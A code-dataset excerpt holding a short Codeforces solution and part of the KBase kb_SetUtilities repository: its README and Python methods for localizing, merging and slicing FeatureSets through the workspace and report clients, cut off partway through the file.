"avg_line_length": 23.44444465637207,
"blob_id": "3bab719483a04a341475233214c537033db945de",
"content_id": "248a5c6bb2ca99deddeb014a2355a9217dadc972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 9,
"path": "/boy_or_girl.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/236/A\n\nwords=input()\nunique_words=''\n\nfor word in words:\n if word not in unique_words: unique_words+=word\n\nprint('CHAT WITH HER!' if len(unique_words)%2==0 else 'IGNORE HIM!')\n"
}
] | 19 |
kbaseapps/kb_SetUtilities
|
https://github.com/kbaseapps/kb_SetUtilities
|
9cddb1b3c62c3f5a2c954f8598ad713afa58a2d1
|
1d093bc1c3b896a541b850cd57b606bdea70d066
|
0da195d072d07fe0f0de5bc4ee1f5cce56fad8a2
|
refs/heads/master
| 2023-07-28T16:05:01.153256 | 2021-09-14T18:52:40 | 2021-09-14T18:52:40 | 100,541,211 | 0 | 3 |
MIT
| 2017-08-16T23:30:11 | 2021-09-14T18:52:43 | 2023-09-13T05:06:00 |
Python
|
[
{
"alpha_fraction": 0.787564754486084,
"alphanum_fraction": 0.787564754486084,
"avg_line_length": 42,
"blob_id": "5bd347a5d07fa8dd8008d2853d5dac208c5c7699",
"content_id": "33d321154d9805fe3355b9dfc499e26c63874406",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 386,
"license_type": "permissive",
"max_line_length": 133,
"num_lines": 9,
"path": "/README.md",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/kbaseapps/kb_Setutilities)\n\n# kb_SetUtilities\n\n A module for set manipulation utilities. Most of these functions were formerly in kb_SetUtilities\n\n---\n\nThis is the basic readme for this module. Include any usage or deployment instructions and links to other documentation here."
},
{
"alpha_fraction": 0.5290688276290894,
"alphanum_fraction": 0.5303225517272949,
"avg_line_length": 46.42170333862305,
"blob_id": "1e9df3ad0c3cf2a6dde8b92234cbed1c7f2ccee9",
"content_id": "357205db8038bcfae6a4d48fc64b7045e7826c48",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 145964,
"license_type": "permissive",
"max_line_length": 202,
"num_lines": 3078,
"path": "/lib/kb_SetUtilities/kb_SetUtilitiesImpl.py",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n#BEGIN_HEADER\nimport os\nimport re\nimport sys\nfrom datetime import datetime\nfrom pprint import pformat # ,pprint\n\nfrom installed_clients.KBaseReportClient import KBaseReport\nfrom installed_clients.SetAPIServiceClient import SetAPI\nfrom installed_clients.WorkspaceClient import Workspace as workspaceService\n#END_HEADER\n\n\nclass kb_SetUtilities:\n '''\n Module Name:\n kb_SetUtilities\n\n Module Description:\n ** A KBase module: kb_SetUtilities\n**\n** This module contains basic utilities for set manipulation, originally extracted\n** from kb_util_dylan\n**\n '''\n\n ######## WARNING FOR GEVENT USERS ####### noqa\n # Since asynchronous IO can lead to methods - even the same method -\n # interrupting each other, you must be *very* careful when using global\n # state. A method could easily clobber the state set by another while\n # the latter method is running.\n ######################################### noqa\n VERSION = \"1.7.6\"\n GIT_URL = \"https://github.com/kbaseapps/kb_SetUtilities\"\n GIT_COMMIT_HASH = \"5d75bb3340d9a3b78f4b81d44f9ec0dc3b2195a9\"\n\n #BEGIN_CLASS_HEADER\n workspaceURL = None\n shockURL = None\n handleURL = None\n serviceWizardsURL = None\n callbackURL = None\n scratch = None\n\n def now_ISO(self):\n now_timestamp = datetime.now()\n now_secs_from_epoch = (now_timestamp - datetime(1970,1,1)).total_seconds()\n now_timestamp_in_iso = datetime.fromtimestamp(int(now_secs_from_epoch)).strftime('%Y-%m-%d_%T')\n return now_timestamp_in_iso\n\n def log(self, target, message):\n # target is a list for collecting log messages\n message = '['+self.now_ISO()+'] '+message\n if target is not None:\n target.append(message)\n print(message)\n sys.stdout.flush()\n\n def check_params (self, params, required_params):\n missing_params = []\n for param in required_params:\n if not params.get(param):\n missing_params.append(param)\n if len(missing_params):\n raise ValueError(\"Missing required param(s):\\n\" + \"\\n\".join(missing_params))\n\n def ws_fetch_error(self, obj_desc, obj_ref, error=None):\n msg = 'Unable to fetch '+obj_desc+' ref:'+ obj_ref + ' from workspace.'\n if error is not None:\n msg += ' Error: ' + str(error)\n raise ValueError(msg)\n\n def set_provenance (self, ctx, input_ws_obj_refs=[], service_name=None, method_name=None):\n if ctx.get('provenance '):\n provenance = ctx['provenance']\n else:\n provenance = [{}]\n # add additional info to provenance here, especially the input data object reference(s)\n if 'input_ws_objects' not in provenance[0]:\n provenance[0]['input_ws_objects'] = []\n if len(input_ws_obj_refs) > 0:\n provenance[0]['input_ws_objects'].extend(input_ws_obj_refs)\n if service_name is not None:\n provenance[0]['service'] = service_name\n if method_name is not None:\n provenance[0]['method'] = method_name\n return provenance\n\n def get_obj_name_and_type_from_obj_info (self, obj_info, full_type=False):\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n obj_name = obj_info[NAME_I]\n obj_type = obj_info[TYPE_I].split('-')[0]\n if not full_type:\n obj_type = obj_type.split('.')[1]\n return (obj_name, obj_type)\n\n def get_obj_ref_from_obj_info (self, obj_info):\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n return '/'.join([str(obj_info[WSID_I]),\n str(obj_info[OBJID_I]),\n str(obj_info[VERSION_I])])\n \n def get_obj_ref_from_obj_info_noVer (self, obj_info):\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n return '/'.join([str(obj_info[WSID_I]),\n str(obj_info[OBJID_I])])\n \n def get_obj_data (self, obj_ref, obj_type_desc, full_type=False):\n obj_data = None\n obj_info = None\n obj_name = None\n obj_type = None\n try:\n objects = self.wsClient.get_objects2({'objects': [{'ref': obj_ref}]})['data'][0]\n except Exception as e:\n self.ws_fetch_error(obj_type_desc+' object', obj_ref, error=e)\n obj_data = objects['data']\n obj_info = objects['info']\n (obj_name, obj_type) = self.get_obj_name_and_type_from_obj_info (obj_info, full_type)\n return (obj_data, obj_info, obj_name, obj_type)\n\n def get_obj_info (self, obj_ref, obj_type_desc, full_type=False):\n obj_info = None\n obj_name = None\n obj_type = None\n try:\n obj_info = self.wsClient.get_object_info_new ({'objects':[{'ref':obj_ref}]})[0]\n except Exception as e:\n self.ws_fetch_error(obj_type_desc+' object info', obj_ref, error=e)\n (obj_name, obj_type) = self.get_obj_name_and_type_from_obj_info (obj_info, full_type)\n return (obj_info, obj_name, obj_type)\n \n def get_obj_info_list_from_ws_id (self, ws_id, obj_type, obj_type_desc):\n obj_info_list = []\n try:\n obj_info_list = self.wsClient.list_objects({'ids':[ws_id],'type':obj_type})\n except Exception as e:\n raise ValueError (\"Unable to list \"+obj_type_desc+\" objects from workspace: \"+str(ws_id)+\" \"+str(e))\n return obj_info_list\n\n def get_obj_info_list_from_ws_name (self, ws_name, obj_type, obj_type_desc):\n obj_info_list = []\n try:\n obj_info_list = self.wsClient.list_objects({'workspaces':[ws_name],'type':obj_type})\n except Exception as e:\n raise ValueError (\"Unable to list \"+obj_type_desc+\" objects from workspace: \"+str(ws_id)+\" \"+str(e))\n return obj_info_list\n \n #END_CLASS_HEADER\n\n # config contains contents of config file in a hash or None if it couldn't\n # be found\n def __init__(self, config):\n #BEGIN_CONSTRUCTOR\n self.token = os.environ['KB_AUTH_TOKEN']\n self.workspaceURL = config['workspace-url']\n self.shockURL = config['shock-url']\n self.serviceWizardURL = config['service-wizard-url']\n\n self.callbackURL = os.environ.get('SDK_CALLBACK_URL')\n# if self.callbackURL == None:\n# self.callbackURL = os.environ['SDK_CALLBACK_URL']\n if self.callbackURL is None:\n raise ValueError(\"SDK_CALLBACK_URL not set in environment\")\n\n self.scratch = os.path.abspath(config['scratch'])\n if not os.path.exists(self.scratch):\n os.makedirs(self.scratch)\n\n # set test status for called modules\n self.SERVICE_VER = 'release'\n\n # instantiate clients\n try:\n self.wsClient = workspaceService(self.workspaceURL, token=self.token)\n except Exception as e:\n raise ValueError('Unable to connect to workspace at ' + self.workspaceURL + str(e))\n\n try:\n self.reportClient = KBaseReport(self.callbackURL, token=self.token, service_ver=self.SERVICE_VER)\n except Exception as e:\n raise ValueError('Unable to instantiate reportClient ' + str(e))\n\n try:\n self.setAPI_Client = SetAPI(url=self.serviceWizardURL, token=self.token, service_ver=self.SERVICE_VER)\n except Exception as e:\n raise ValueError('Unable to instantiate SetAPI' + str(e))\n \n #END_CONSTRUCTOR\n pass\n\n\n def KButil_Localize_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Localize_GenomeSet_Params\"\n (KButil_Localize_GenomeSet() ** ** Method for creating Genome Set\n with all local Genomes) -> structure: parameter \"workspace_name\"\n of type \"workspace_name\" (** The workspace object refs are of\n form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\"\n :returns: instance of type \"KButil_Localize_GenomeSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Localize_GenomeSet\n raise NotImplementedError\n #END KButil_Localize_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Localize_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Localize_FeatureSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Localize_FeatureSet_Params\"\n (KButil_Localize_FeatureSet() ** ** Method for creating Feature\n Set with all local Genomes) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_ref\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\"\n :returns: instance of type \"KButil_Localize_FeatureSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Localize_FeatureSet\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Localize_FeatureSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # param checks\n required_params = ['workspace_name',\n 'input_ref'\n ]\n self.check_params (params, required_params)\n\n\n # read FeatureSet to get local workspace ID, source object name, and list of original genome refs\n #\n self.log (console, \"READING LOCAL WORKSPACE ID\")\n src_featureSet_ref = params['input_ref']\n\n (src_featureSet,\n info,\n src_featureSet_name,\n type_name) = self.get_obj_data(src_featureSet_ref, 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n # Set local WSID from FeatureSet\n local_WSID = str(info[WSID_I])\n\n\n # read workspace to determine which genome objects are already present\n #\n genome_obj_type = \"KBaseGenomes.Genome\"\n local_genome_refs_by_name = dict()\n genome_obj_info_list = self.get_obj_info_list_from_ws_id(local_WSID,\n genome_obj_type,\n genome_obj_type)\n\n for info in genome_obj_info_list:\n genome_obj_ref = self.get_obj_ref_from_obj_info(info)\n (genome_obj_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n local_genome_refs_by_name[genome_obj_name] = genome_obj_ref\n\n\n # set order for features list\n #\n self.log (console, \"GETTING FEATURES ORDERING\")\n src_featureSet = data\n src_element_ordering = []\n if 'element_ordering' in list(src_featureSet.keys()):\n src_element_ordering = src_featureSet['element_ordering']\n else:\n src_element_ordering = sorted(src_featureSet['elements'].keys())\n logMsg = 'features in input set {}: {}'.format(src_featureSet_ref,\n len(src_element_ordering))\n self.log(console, logMsg)\n report += logMsg\n\n\n # Standardize genome refs to numerical IDs\n #\n self.log (console, \"STANDARDIZING GENOME REFS\")\n genome_ref_to_standardized = dict()\n standardized_genome_refs = []\n for fId in src_element_ordering:\n for src_genome_ref in src_featureSet['elements'][fId]:\n if src_genome_ref in genome_ref_to_standardized:\n pass\n else:\n (src_genome_obj_info,\n src_genome_obj_name,\n src_genome_obj_type) = self.get_obj_info(src_genome_ref, 'genome', full_type=True)\n\n #acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseGenomeAnnotations.GenomeAnnotation\"]\n acceptable_types = [\"KBaseGenomes.Genome\"]\n if src_genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + src_genome_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_src_genome_ref = self.get_obj_ref_from_obj_info(src_genome_obj_info)\n genome_ref_to_standardized[src_genome_ref] = standardized_src_genome_ref\n standardized_genome_refs.append(standardized_src_genome_ref)\n\n\n # Copy all non-local genomes to local workspace\n #\n self.log (console, \"COPYING NON-LOCAL GENOMES TO LOCAL WORKSPACE\")\n src2dst_genome_refs = dict()\n objects_created = []\n local_genome_cnt = 0\n non_local_genome_cnt = 0\n for src_genome_ref in standardized_genome_refs:\n this_WSID = str(src_genome_ref.split('/')[0])\n if this_WSID == local_WSID:\n src2dst_genome_refs[src_genome_ref] = src_genome_ref\n else:\n (src_genome_obj_data,\n src_genome_obj_info,\n src_genome_obj_name,\n type_name) = self.get_obj_data(src_genome_ref, 'genome')\n\n if src_genome_obj_name in local_genome_refs_by_name:\n src2dst_genome_refs[src_genome_ref] = local_genome_refs_by_name[src_genome_obj_name]\n local_genome_cnt += 1\n continue\n non_local_genome_cnt += 1\n\n # set provenance\n input_ws_obj_refs = [src_featureSet_ref, src_genome_ref]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Localize_FeatureSet')\n\n # Save object\n src_genome_obj_ref = self.get_obj_ref_from_obj_info(src_genome_obj_info)\n self.log(console, \"SAVING GENOME \"+src_genome_obj_ref+\" to workspace \"+str(params['workspace_name'])+\" (ws.\"+str(local_WSID)+\")\")\n dst_genome_obj_data = src_genome_obj_data\n (dst_genome_obj_name, type_name) = self.get_obj_name_and_type_from_obj_info (src_genome_obj_info)\n dst_genome_obj_info = self.wsClient.save_objects({\n 'workspace': params['workspace_name'],\n 'objects': [\n {\n 'type': 'KBaseGenomes.Genome',\n 'data': dst_genome_obj_data,\n 'name': dst_genome_obj_name,\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n dst_standardized_genome_ref = self.get_obj_ref_from_obj_info(dst_genome_obj_info)\n src2dst_genome_refs[src_genome_ref] = dst_standardized_genome_ref\n objects_created.append({'ref': dst_standardized_genome_ref,\n 'description': 'localized '+dst_genome_obj_name})\n\n\n # Build Localized FeatureSet with local genome_refs\n #\n if non_local_genome_cnt == 0 and local_genome_cnt == 0:\n self.log (console, \"NO NON-LOCAL GENOME REFS FOUND\")\n else:\n self.log (console, \"BUILDING LOCAL FEATURESET\")\n dst_featureSet_data = dict()\n dst_featureSet_data['desc'] = src_featureSet['desc']+' - localized'\n dst_featureSet_data['element_ordering'] = src_element_ordering\n dst_featureSet_data['elements'] = dict()\n for fId in src_element_ordering:\n dst_genome_refs = []\n for orig_src_genome_ref in src_featureSet[fId]:\n standardized_src_genome_ref = genome_ref_to_standardized[orig_src_genome_ref]\n dst_genome_refs.append(src2dst_genome_refs[standardized_src_genome_ref])\n dst_featureSet_data['elements'][fId] = dst_genome_refs\n\n\n # Overwrite input FeatureSet object with local genome refs\n dst_featureSet_name = src_featureSet_name\n\n # set provenance\n input_ws_obj_refs = [src_featureSet_ref]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Localize_FeatureSet')\n\n # save output obj\n dst_featureSet_info = self.wsClient.save_objects({\n 'workspace': params['workspace_name'],\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': dst_featureSet_name,\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n objects_created.append({'ref': params['workspace_name']+'/'+dst_featureSet_name,\n 'description': 'localized FeatureSet'})\n\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n\n total_genomes_cnt = len(standardized_genome_refs)\n if non_local_genome_cnt > 0 or local_genome_cnt > 0:\n final_msg = []\n final_msg.append(\"Total genomes in FeatureSet: \" + str(total_genome_cnt))\n final_msg.append(\"Non-local genomes copied over: \" + str(non_local_genome_cnt))\n final_msg.append(\"Local genomes with remote references: \" + str(local_genome_cnt))\n logMsg = \"\\n\".join(final_msg)\n self.log(console, logMsg)\n report += logMsg\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n report += \"NO NON-LOCAL GENOMES FOUND. NO NEW FEATURESET CREATED.\"\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Localize_FeatureSet DONE\")\n #END KButil_Localize_FeatureSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Localize_FeatureSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Merge_FeatureSet_Collection(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Merge_FeatureSet_Collection_Params\"\n (KButil_Merge_FeatureSet_Collection() ** ** Method for merging\n FeatureSets) -> structure: parameter \"workspace_name\" of type\n \"workspace_name\" (** The workspace object refs are of form: ** ** \n objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Merge_FeatureSet_Collection_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Merge_FeatureSet_Collection\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Merge_FeatureSet_Collection with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # param checks\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Merged FeatureSet'\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 2:\n self.log(console, \"Must provide at least two FeatureSets\")\n self.log(invalid_msgs, \"Must provide at least two FeatureSets\")\n\n # Build FeatureSet\n element_ordering = []\n elements = {}\n featureSet_seen = dict()\n feature_seen = dict()\n input_feature_cnt = dict()\n merged_feature_cnt = 0\n for featureSet_ref in params['input_refs']:\n if featureSet_ref not in list(featureSet_seen.keys()):\n featureSet_seen[featureSet_ref] = True\n input_feature_cnt[featureSet_ref] = 0\n else:\n self.log(console, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n self.log(invalid_msgs, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n continue\n\n (this_featureSet,\n info,\n obj_name,\n type_name) = self.get_obj_data(featureSet_ref, 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n this_element_ordering = []\n if 'element_ordering' in list(this_featureSet.keys()):\n this_element_ordering = this_featureSet['element_ordering']\n else:\n this_element_ordering = sorted(this_featureSet['elements'].keys())\n logMsg = 'features in input set {}: {}'.format(featureSet_ref,\n len(this_element_ordering))\n self.log(console, logMsg)\n\n for fId in this_element_ordering:\n if not elements.get(fId):\n elements[fId] = []\n element_ordering.append(fId)\n for genome_ref in this_featureSet['elements'][fId]:\n input_feature_cnt[featureSet_ref] += 1\n unique_fId = genome_ref+'-'+fId\n if not feature_seen.get(unique_fId):\n elements[fId].append(genome_ref)\n merged_feature_cnt += 1\n feature_seen[unique_fId] = True\n report += 'features in input set ' + featureSet_ref + ': ' + str(\n input_feature_cnt[featureSet_ref]) + \"\\n\"\n \n # set provenance\n input_ws_obj_refs = params['input_refs']\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Merge_FeatureSet_Collection')\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING FEATURESET\")\n output_FeatureSet = {'description': params['desc'],\n 'element_ordering': element_ordering,\n 'elements': elements}\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance}]})[0]\n \n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"features in output set \" + params['output_name'] + \": \"\n + str(merged_feature_cnt))\n report += 'features in output set ' + params['output_name'] + ': '\n report += str(merged_feature_cnt) + \"\\n\"\n reportObj = {\n 'objects_created': [{'ref': params['workspace_name'] + '/' + params['output_name'],\n 'description':'KButil_Merge_FeatureSet_Collection'}],\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Merge_FeatureSet_Collection DONE\")\n #END KButil_Merge_FeatureSet_Collection\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Merge_FeatureSet_Collection return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Slice_FeatureSets_by_Genomes(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Slice_FeatureSets_by_Genomes_Params\"\n (KButil_Slice_FeatureSets_by_Genomes() ** ** Method for Slicing a\n FeatureSet or FeatureSets by a Genome, Genomes, or GenomeSet) ->\n structure: parameter \"workspace_name\" of type \"workspace_name\" (**\n The workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_featureSet_refs\" of type \"data_obj_ref\",\n parameter \"input_genome_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type\n \"KButil_Slice_FeatureSets_by_Genomes_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Slice_FeatureSets_by_Genomes\n console = []\n invalid_msgs = []\n self.log(console, 'Running Slice_FeatureSets_by_Genomes with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_featureSet_refs',\n 'input_genome_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced FeatureSet'\n\n\n # clean input_feature_refs\n clean_input_refs = []\n for ref in params['input_featureSet_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_featureSet_refs'] = clean_input_refs\n\n # clean input_genome_refs\n clean_input_refs = []\n for ref in params['input_genome_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_genome_refs'] = clean_input_refs\n\n\n # Standardize genome refs so string comparisons are valid (only do requested genomes)\n #\n genome_ref_to_standardized = dict()\n genome_ref_from_standardized_in_input_flag = dict()\n for this_genome_ref in params['input_genome_refs']:\n\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n \n acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseMetagenomes.AnnotatedMetagenomeAssembly\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + genome_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n this_standardized_genome_ref = self.get_obj_ref_from_obj_info(genome_obj_info)\n genome_ref_to_standardized[this_genome_ref] = this_standardized_genome_ref\n genome_ref_from_standardized_in_input_flag[this_standardized_genome_ref] = True\n\n\n # Build FeatureSets\n #\n featureSet_seen = dict()\n featureSet_genome_ref_to_standardized = dict() # have to map genome refs in featureSets also because might be mixed WS_ID-WS_NAME/OBJID-OBJNAME and not exactly correspond with input genome refs\n feature_list_lens = []\n objects_created = []\n\n for featureSet_ref in params['input_featureSet_refs']:\n if featureSet_ref not in list(featureSet_seen.keys()):\n featureSet_seen[featureSet_ref] = 1\n else:\n self.log(console, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n self.log(invalid_msgs, \"repeat featureSet_ref: '\" + featureSet_ref + \"'\")\n continue\n\n (this_featureSet,\n info,\n this_featureSet_obj_name,\n type_name) = self.get_obj_data(featureSet_ref, 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n this_element_ordering = []\n if 'element_ordering' in list(this_featureSet.keys()):\n this_element_ordering = this_featureSet['element_ordering']\n else:\n this_element_ordering = sorted(this_featureSet['elements'].keys())\n logMsg = 'features in input set {}: {}'.format(featureSet_ref,\n len(this_element_ordering))\n self.log(console, logMsg)\n\n\n # Build sliced FeatureSet\n #\n self.log (console, \"BUILDING SLICED FEATURESET\\n\")\n self.log (console, \"Slicing out genomes \"+(\"\\n\".join(params['input_genome_refs'])))\n element_ordering = []\n elements = {}\n for fId in this_element_ordering:\n feature_hit = False\n genomes_retained = []\n for this_genome_ref in this_featureSet['elements'][fId]:\n genome_hit = False\n\n if this_genome_ref in genome_ref_to_standardized: # The KEY line\n genome_hit = True\n standardized_genome_ref = genome_ref_to_standardized[this_genome_ref]\n elif this_genome_ref in featureSet_genome_ref_to_standardized:\n standardized_genome_ref = featureSet_genome_ref_to_standardized[this_genome_ref]\n if standardized_genome_ref in genome_ref_from_standardized_in_input_flag:\n genome_hit = True\n else: # get standardized genome_ref\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n\n acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseMetagenomes.AnnotatedMetagenomeAssembly\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + genome_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_genome_ref = self.get_obj_ref_from_obj_info(genome_obj_info)\n featureSet_genome_ref_to_standardized[this_genome_ref] = standardized_genome_ref\n if standardized_genome_ref in genome_ref_from_standardized_in_input_flag:\n genome_hit = True\n\n if genome_hit:\n feature_hit = True\n genomes_retained.append(standardized_genome_ref)\n\n if feature_hit:\n element_ordering.append(fId)\n elements[fId] = genomes_retained\n logMsg = 'features in sliced output set: {}'.format(len(element_ordering))\n self.log(console, logMsg)\n\n\n # Save output FeatureSet\n #\n if len(element_ordering) == 0:\n report += 'no features for requested genomes in FeatureSet '+str(featureSet_ref)\n feature_list_lens.append(0)\n else:\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = [featureSet_ref]\n input_ws_obj_refs.extend(params['input_genome_refs'])\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Slice_FeatureSets_by_Genome')\n\n # Store output object\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING FEATURESET\")\n output_FeatureSet = {'description': 